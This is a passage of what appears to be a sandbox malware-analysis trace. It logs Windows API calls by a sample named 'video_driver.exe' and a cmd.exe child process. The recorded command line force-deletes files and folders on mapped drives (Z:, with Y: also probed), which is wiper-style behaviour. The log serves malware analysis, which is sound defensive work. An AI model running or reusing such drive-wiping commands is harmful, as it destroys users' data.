LCType=0x21, lpLCData=0x3ffbf8, cchData=128 | out: lpLCData="0") returned 2 [0066.326] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3ffbf8, cchData=128 | out: lpLCData="1") returned 2 [0066.326] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0066.326] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0066.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0066.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0066.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0066.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0066.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0066.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0066.327] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0066.327] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0066.327] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0066.329] GetProcessHeap () returned 0x4e0000 [0066.329] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x20c) returned 0x4f2ef8 [0066.329] GetConsoleTitleW (in: lpConsoleTitle=0x4f2ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0066.330] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0066.330] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0066.330] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0066.330] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0066.331] GetProcessHeap () returned 0x4e0000 [0066.331] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x400a) returned 0x4f6ae0 [0066.331] GetProcessHeap () returned 0x4e0000 [0066.331] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x4008) returned 0x4faaf8 [0066.332] GetProcessHeap () returned 0x4e0000 [0066.332] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1a) returned 0x4f57e0 [0066.332] GetEnvironmentVariableW (in: lpName="p IN (\"Y", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0066.332] _wcsicmp (_String1="p IN (\"Y", _String2="CD") returned 13 [0066.332] _wcsicmp (_String1="p IN (\"Y", _String2="ERRORLEVEL") returned 11 [0066.332] _wcsicmp (_String1="p IN (\"Y", _String2="CMDEXTVERSION") returned 13 [0066.332] _wcsicmp (_String1="p IN (\"Y", _String2="CMDCMDLINE") returned 13 [0066.332] _wcsicmp (_String1="p IN (\"Y", _String2="DATE") returned 12 [0066.332] _wcsicmp (_String1="p IN (\"Y", _String2="TIME") returned -4 [0066.332] _wcsicmp (_String1="p IN (\"Y", _String2="RANDOM") returned -2 [0066.332] _wcsicmp (_String1="p IN (\"Y", _String2="HIGHESTNUMANODENUMBER") returned 8 [0066.332] GetProcessHeap () returned 0x4e0000 [0066.332] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f57e0 | out: hHeap=0x4e0000) returned 1 [0066.332] GetProcessHeap () returned 0x4e0000 [0066.332] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4faaf8 | out: hHeap=0x4e0000) returned 1 [0066.332] GetProcessHeap () returned 0x4e0000 [0066.333] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x4008) returned 0x4faaf8 [0066.333] GetProcessHeap () returned 0x4e0000 [0066.333] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4faaf8 | out: hHeap=0x4e0000) returned 1 [0066.333] GetProcessHeap () returned 0x4e0000 [0066.333] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6ae0 | out: hHeap=0x4e0000) returned 1 [0066.333] _wcsicmp (_String1="if", _String2=")") returned 64 [0066.333] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0066.333] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0066.333] _wcsicmp (_String1="IF", _String2="if") returned 0 [0066.333] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0066.333] GetProcessHeap () returned 0x4e0000 [0066.333] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x58) returned 0x4f3110 [0066.333] GetProcessHeap () returned 0x4e0000 [0066.333] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xe) returned 0x4effc0 [0066.334] GetProcessHeap () returned 0x4e0000 [0066.334] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x20) returned 0x4f57e0 [0066.334] GetProcessHeap () returned 0x4e0000 [0066.334] RtlReAllocateHeap (Heap=0x4e0000, Flags=0x0, Ptr=0x4f57e0, Size=0x16) returned 0x4f1800 [0066.335] GetProcessHeap () returned 0x4e0000 [0066.335] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f1800) returned 0x16 [0066.335] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0066.335] GetProcessHeap () returned 0x4e0000 [0066.335] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x58) returned 0x4f3170 [0066.335] GetProcessHeap () returned 0x4e0000 [0066.335] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x14) returned 0x4f31d0 [0066.335] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0066.335] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0066.336] GetProcessHeap () returned 0x4e0000 [0066.336] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x12) returned 0x4f31f0 [0066.336] GetProcessHeap () returned 0x4e0000 [0066.336] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1c) returned 0x4f57e0 [0066.336] GetProcessHeap () returned 0x4e0000 [0066.336] RtlReAllocateHeap (Heap=0x4e0000, Flags=0x0, Ptr=0x4f57e0, Size=0x14) returned 0x4f3210 [0066.336] GetProcessHeap () returned 0x4e0000 [0066.336] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f3210) returned 0x14 [0066.337] _wcsicmp (_String1="del", _String2=")") returned 59 [0066.337] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0066.337] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0066.337] _wcsicmp (_String1="IF", _String2="del") returned 5 [0066.337] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0066.337] _wcsicmp (_String1="REM", _String2="del") returned 14 [0066.337] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0066.337] GetProcessHeap () returned 0x4e0000 [0066.337] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x58) returned 0x4f3230 [0066.337] GetProcessHeap () returned 0x4e0000 [0066.337] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x10) returned 0x4effd8 [0066.337] GetProcessHeap () returned 0x4e0000 [0066.337] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x28) returned 0x4f3290 [0066.338] GetProcessHeap () returned 0x4e0000 [0066.338] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x58) returned 0x4f32c0 [0066.339] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0066.339] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0066.339] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0066.339] GetProcessHeap () returned 0x4e0000 [0066.339] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x58) returned 0x4f3320 [0066.339] GetProcessHeap () returned 0x4e0000 [0066.339] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x44) returned 0x4f3380 [0066.339] GetProcessHeap () returned 0x4e0000 [0066.339] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x14) returned 0x4f33d0 [0066.340] GetProcessHeap () returned 0x4e0000 [0066.340] RtlReAllocateHeap (Heap=0x4e0000, Flags=0x0, Ptr=0x4f33d0, Size=0x12) returned 0x4f33d0 [0066.340] GetProcessHeap () returned 0x4e0000 [0066.340] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f33d0) returned 0x12 [0066.340] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0066.340] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0066.341] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0066.341] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0066.341] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0066.341] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0066.341] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0066.342] GetProcessHeap () returned 0x4e0000 [0066.342] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x12) returned 0x4f33f0 [0066.342] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0066.343] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0066.343] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0066.343] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0066.343] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0066.343] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0066.343] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0066.343] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0066.343] GetProcessHeap () returned 0x4e0000 [0066.344] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x58) returned 0x4f3410 [0066.344] GetProcessHeap () returned 0x4e0000 [0066.344] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x14) returned 0x4f3470 [0066.344] GetProcessHeap () returned 0x4e0000 [0066.344] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x20) returned 0x4f57e0 [0066.346] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0066.348] GetFullPathNameW (in: lpFileName="Y:", nBufferLength=0x208, lpBuffer=0x3ff8e8, lpFilePart=0x3ff694 | out: lpBuffer="Y:\\", lpFilePart=0x3ff694*=0x0) returned 0x3 [0066.348] wcsncmp (_String1="Y:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -3 [0066.353] GetFileAttributesW (lpFileName="Y:\\" (normalized: "y:")) returned 0xffffffff [0066.353] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.353] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0066.354] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.354] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0066.354] _get_osfhandle (_FileHandle=0) returned 0x3 [0066.354] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0066.354] SetConsoleInputExeNameW () returned 0x1 [0066.354] GetConsoleOutputCP () returned 0x1b5 [0066.354] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0066.354] SetThreadUILanguage (LangId=0x0) returned 0x409 [0066.355] exit (_Code=0) Process: id = "46" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x41e45000" os_pid = "0xbb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"Z:\" del /f /s /q \"Z:\" & FOR /D %p IN (\"Z:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 74 os_tid = 0xa68 [0066.453] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fda4 | out: lpSystemTimeAsFileTime=0x24fda4*(dwLowDateTime=0x56ba160, dwHighDateTime=0x1d62400)) [0066.453] GetCurrentProcessId () returned 0xbb8 [0066.453] GetCurrentThreadId () returned 0xa68 [0066.453] GetTickCount () returned 0x11480b5 [0066.453] QueryPerformanceCounter (in: lpPerformanceCount=0x24fd9c | out: lpPerformanceCount=0x24fd9c*=18659863980) returned 1 [0066.468] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0066.468] __set_app_type (_Type=0x1) [0066.468] __p__fmode () returned 0x770331f4 [0066.468] __p__commode () returned 0x770331fc [0066.468] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0066.469] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0066.469] GetCurrentThreadId () returned 0xa68 [0066.469] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa68) returned 0x60 [0066.469] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0066.469] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0066.469] SetThreadUILanguage (LangId=0x0) returned 0x409 [0066.470] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0066.470] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fd34 | out: phkResult=0x24fd34*=0x0) returned 0x2 [0066.471] VirtualQuery (in: lpAddress=0x24fd6b, lpBuffer=0x24fd04, dwLength=0x1c | out: lpBuffer=0x24fd04*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0066.471] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fd04, dwLength=0x1c | out: lpBuffer=0x24fd04*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0066.471] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fd04, dwLength=0x1c | out: lpBuffer=0x24fd04*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0066.471] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fd04, dwLength=0x1c | out: lpBuffer=0x24fd04*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0066.471] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fd04, dwLength=0x1c | out: lpBuffer=0x24fd04*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0066.471] GetConsoleOutputCP () returned 0x1b5 [0066.471] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0066.471] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0066.471] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.471] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0066.472] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.472] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0066.472] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.472] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0066.472] _get_osfhandle (_FileHandle=0) returned 0x3 [0066.472] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0066.473] GetEnvironmentStringsW () returned 0x3e20f8* [0066.473] GetProcessHeap () returned 0x3d0000 [0066.473] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xaca) returned 0x3e2bd0 [0066.473] FreeEnvironmentStringsW (penv=0x3e20f8) returned 1 [0066.473] GetProcessHeap () returned 0x3d0000 [0066.473] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x4) returned 0x3e1898 [0066.473] GetEnvironmentStringsW () returned 0x3e20f8* [0066.473] GetProcessHeap () returned 0x3d0000 [0066.473] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xaca) returned 0x3e36a8 [0066.473] FreeEnvironmentStringsW (penv=0x3e20f8) returned 1 [0066.473] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24eca4 | out: phkResult=0x24eca4*=0x68) returned 0x0 [0066.474] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ecac, lpData=0x24ecb0, lpcbData=0x24eca8*=0x1000 | out: lpType=0x24ecac*=0x0, lpData=0x24ecb0*=0x0, lpcbData=0x24eca8*=0x1000) returned 0x2 [0066.474] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ecac, lpData=0x24ecb0, lpcbData=0x24eca8*=0x1000 | out: lpType=0x24ecac*=0x4, lpData=0x24ecb0*=0x1, lpcbData=0x24eca8*=0x4) returned 0x0 [0066.474] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ecac, lpData=0x24ecb0, lpcbData=0x24eca8*=0x1000 | out: lpType=0x24ecac*=0x0, lpData=0x24ecb0*=0x1, lpcbData=0x24eca8*=0x1000) returned 0x2 [0066.474] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ecac, lpData=0x24ecb0, lpcbData=0x24eca8*=0x1000 | out: lpType=0x24ecac*=0x4, lpData=0x24ecb0*=0x0, lpcbData=0x24eca8*=0x4) returned 0x0 [0066.474] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ecac, lpData=0x24ecb0, lpcbData=0x24eca8*=0x1000 | out: lpType=0x24ecac*=0x4, lpData=0x24ecb0*=0x40, lpcbData=0x24eca8*=0x4) returned 0x0 [0066.474] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ecac, lpData=0x24ecb0, lpcbData=0x24eca8*=0x1000 | out: lpType=0x24ecac*=0x4, lpData=0x24ecb0*=0x40, lpcbData=0x24eca8*=0x4) returned 0x0 [0066.474] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ecac, lpData=0x24ecb0, lpcbData=0x24eca8*=0x1000 | out: lpType=0x24ecac*=0x0, lpData=0x24ecb0*=0x40, lpcbData=0x24eca8*=0x1000) returned 0x2 [0066.474] RegCloseKey (hKey=0x68) returned 0x0 [0066.474] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24eca4 | out: phkResult=0x24eca4*=0x68) returned 0x0 [0066.474] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ecac, lpData=0x24ecb0, lpcbData=0x24eca8*=0x1000 | out: lpType=0x24ecac*=0x0, lpData=0x24ecb0*=0x40, lpcbData=0x24eca8*=0x1000) returned 0x2 [0066.474] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ecac, lpData=0x24ecb0, lpcbData=0x24eca8*=0x1000 | out: lpType=0x24ecac*=0x4, lpData=0x24ecb0*=0x1, lpcbData=0x24eca8*=0x4) returned 0x0 [0066.474] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ecac, lpData=0x24ecb0, lpcbData=0x24eca8*=0x1000 | out: lpType=0x24ecac*=0x0, lpData=0x24ecb0*=0x1, lpcbData=0x24eca8*=0x1000) returned 0x2 [0066.474] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ecac, lpData=0x24ecb0, lpcbData=0x24eca8*=0x1000 | out: lpType=0x24ecac*=0x4, lpData=0x24ecb0*=0x0, lpcbData=0x24eca8*=0x4) returned 0x0 [0066.475] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ecac, lpData=0x24ecb0, lpcbData=0x24eca8*=0x1000 | out: lpType=0x24ecac*=0x4, lpData=0x24ecb0*=0x9, lpcbData=0x24eca8*=0x4) returned 0x0 [0066.475] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ecac, lpData=0x24ecb0, lpcbData=0x24eca8*=0x1000 | out: lpType=0x24ecac*=0x4, lpData=0x24ecb0*=0x9, lpcbData=0x24eca8*=0x4) returned 0x0 [0066.475] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ecac, lpData=0x24ecb0, lpcbData=0x24eca8*=0x1000 | out: lpType=0x24ecac*=0x0, lpData=0x24ecb0*=0x9, lpcbData=0x24eca8*=0x1000) returned 0x2 [0066.475] RegCloseKey (hKey=0x68) returned 0x0 [0066.475] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6c [0066.475] srand (_Seed=0x5eb34b6c) [0066.475] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"Z:\" del /f /s /q \"Z:\" & FOR /D %p IN (\"Z:\") DO rmdir \"%p\" /s /q" [0066.475] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"Z:\" del /f /s /q \"Z:\" & FOR /D %p IN (\"Z:\") DO rmdir \"%p\" /s /q" [0066.475] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0066.475] GetProcessHeap () returned 0x3d0000 [0066.475] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x210) returned 0x3e20f8 [0066.475] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e2100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0066.476] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0066.476] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0066.476] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0066.476] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0066.476] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0066.476] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0066.476] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0066.476] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0066.476] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0066.476] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0066.476] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0066.476] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0066.476] GetProcessHeap () returned 0x3d0000 [0066.476] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e2bd0 | out: hHeap=0x3d0000) returned 1 [0066.476] GetEnvironmentStringsW () returned 0x3e2310* [0066.476] GetProcessHeap () returned 0x3d0000 [0066.476] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xae2) returned 0x3e4c70 [0066.477] FreeEnvironmentStringsW (penv=0x3e2310) returned 1 [0066.477] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0066.477] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0066.477] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0066.477] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0066.477] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0066.477] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0066.477] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0066.477] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0066.477] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0066.477] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0066.477] GetProcessHeap () returned 0x3d0000 [0066.477] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x54) returned 0x3e17c8 [0066.477] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24fa70 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0066.477] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x24fa70, lpFilePart=0x24fa6c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x24fa6c*="Desktop") returned 0x25 [0066.477] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0066.477] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f7ec | out: lpFindFileData=0x24f7ec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3e5760 [0066.478] FindClose (in: hFindFile=0x3e5760 | out: hFindFile=0x3e5760) returned 1 [0066.478] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x24f7ec | out: lpFindFileData=0x24f7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3e5760 [0066.478] FindClose (in: hFindFile=0x3e5760 | out: hFindFile=0x3e5760) returned 1 [0066.478] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0066.478] FindFirstFileW (in: 